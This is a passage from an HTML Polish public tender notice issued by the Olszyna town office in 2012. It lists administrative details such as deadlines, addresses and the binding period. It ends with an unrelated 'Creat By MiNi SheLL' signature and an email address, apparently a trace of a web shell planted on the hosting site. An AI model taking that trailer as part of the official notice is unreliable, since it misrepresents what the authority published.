7)	działania siły wyższej (np. klęską żywiołowa), mające bezpośredni wpływ na terminowość wykonywania robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.olszyna.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
ul. Wolności 6
59-830 Olszyna
budynek B, pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2012 godzina 09:00, miejsce: Urząd Miejski
ul. Wolności 6
59-830 Olszyna
I piętro - sekretariat (pokój nr 5).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com